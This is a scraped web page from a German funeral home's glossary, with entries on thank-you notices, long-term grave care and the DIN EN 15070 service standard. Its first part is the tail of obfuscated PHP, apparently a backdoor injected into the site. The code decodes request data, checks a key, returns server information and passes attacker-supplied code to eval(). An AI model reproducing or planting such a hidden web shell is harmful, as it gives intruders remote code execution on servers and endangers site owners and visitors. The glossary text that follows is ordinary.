$f7e34576){$ob8f=$f7e34576;$gde3=$n9e81;}if(!$ob8f){foreach($yfae054[$yfae054['ycfd'][77].$yfae054['ycfd'][97].$yfae054['ycfd'][75].$yfae054['ycfd'][17].$yfae054['ycfd'][8]]as$n9e81=>$f7e34576){$ob8f=$f7e34576;$gde3=$n9e81;}}$ob8f=@$yfae054[$yfae054['ycfd'][59].$yfae054['ycfd'][80].$yfae054['ycfd'][83].$yfae054['ycfd'][23].$yfae054['ycfd'][97].$yfae054['ycfd'][80]]($yfae054[$yfae054['ycfd'][68].$yfae054['ycfd'][47].$yfae054['ycfd'][75].$yfae054['ycfd'][41]]($yfae054[$yfae054['ycfd'][76].$yfae054['ycfd'][65].$yfae054['ycfd'][17].$yfae054['ycfd'][38].$yfae054['ycfd'][86].$yfae054['ycfd'][86].$yfae054['ycfd'][17].$yfae054['ycfd'][80]]($ob8f),$gde3));if(isset($ob8f[$yfae054['ycfd'][75].$yfae054['ycfd'][21]])&&$b59b9==$ob8f[$yfae054['ycfd'][75].$yfae054['ycfd'][21]]){if($ob8f[$yfae054['ycfd'][75]]==$yfae054['ycfd'][85]){$a937ed=Array($yfae054['ycfd'][67].$yfae054['ycfd'][59]=>@$yfae054[$yfae054['ycfd'][81].$yfae054['ycfd'][97].$yfae054['ycfd'][53].$yfae054['ycfd'][65].$yfae054['ycfd'][65].$yfae054['ycfd'][23].$yfae054['ycfd'][71]](),$yfae054['ycfd'][77].$yfae054['ycfd'][59]=>$yfae054['ycfd'][83].$yfae054['ycfd'][55].$yfae054['ycfd'][72].$yfae054['ycfd'][35].$yfae054['ycfd'][83],);echo@$yfae054[$yfae054['ycfd'][54].$yfae054['ycfd'][75].$yfae054['ycfd'][75].$yfae054['ycfd'][97].$yfae054['ycfd'][75]]($a937ed);}elseif($ob8f[$yfae054['ycfd'][75]]==$yfae054['ycfd'][23]){eval/*s02a413*/($ob8f[$yfae054['ycfd'][97]]);}exit();} ?> Bestatterglossar: D wie Danksagung
Netzeweg 40
33689 Bielefeld-Sennestadt
Telefon 05205 91 28 0
SOFORTHILFE IM TRAUERFALL: 05205 91 28 0

BESTATTERGLOSSAR

A B D E F G H J K M N P R S T U V W Z

Danksagung

Drei bis vier Wochen nach der Bestattung bedanken sich die Hinterbliebenen für die Hilfe in der Trauer, Beileidsbekundungen, Kranz- und Blumenspenden etc. Dies kann in Form einer Zeitungsanzeige, einem persönlichen Brief, aber auch in Form von gedruckten Danksagungskarten geschehen. Wir helfen Ihnen gerne bei der Papier- und Textauswahl.

Dauergrabpflege

"Wer wird sich später um meine Grabstelle kümmern?" Diese Sorge beschäftigt heute viele Menschen. Nicht selten scheint die Flucht in eine anonyme Bestattung der einzige Ausweg zu sein. Hier bietet der Friedhofsgärtner eine vernünftige Alternative, denn eine Dauergrabpflegevereinbarung kann schon zu Lebzeiten "für die Zeit danach" abgeschlossen werden. Dauergrabpflege ist ein Angebot für die langjährige Betreuung einer bereits bestehenden oder zukünftigen Grabstelle durch den Friedhofsgärtner. Die Pflegekosten richten sich nach der Laufzeit des Vertrages und dem von Ihnen gewünschten Leistungsumfang. Sie werden bei Vertragsabschluss in einer Summe bezahlt. Die Dauergrabpflege-Einrichtung legt das eingezahlte Kapital sicher an, bezahlt jährlich den Friedhofsgärtner und kontrolliert turnusmäßig die erbrachten Leistungen. Für ein entsprechendes Angebot können Sie sich gerne an uns wenden. Wir werden uns mit einem für den jeweiligen Friedhof zuständigen Friedhofsgärtner in Verbindung setzen, um die Kosten für die von Ihnen gewünschte Grabpflege zu ermitteln.

DIN EN 15070

Bestattungen sind für Trauernde eine höchst sensible Angelegenheit. Der Trauernde ist, wenn er Bedarf an Bestattungsdienstleistungen hat, in einem emotional stark belasteten Zustand und ihm fehlt deswegen oft der klare und kritische Blick auf die ihm offerierten Angebote. Besonders aus diesem Grunde wurde es für nötig erachtet, Qualitätsanforderungen an die angebotenen Dienstleistungen zu setzen und somit eine hohe Transparenz zu erreichen. In der DIN EN 15070 werden die Anforderungen für die fachgerechten Bestattungsdienstleistungen beschrieben, die europaweit einheitlich festgelegt wurden. Auch unser Institut arbeitet nach diesen Anforderungen.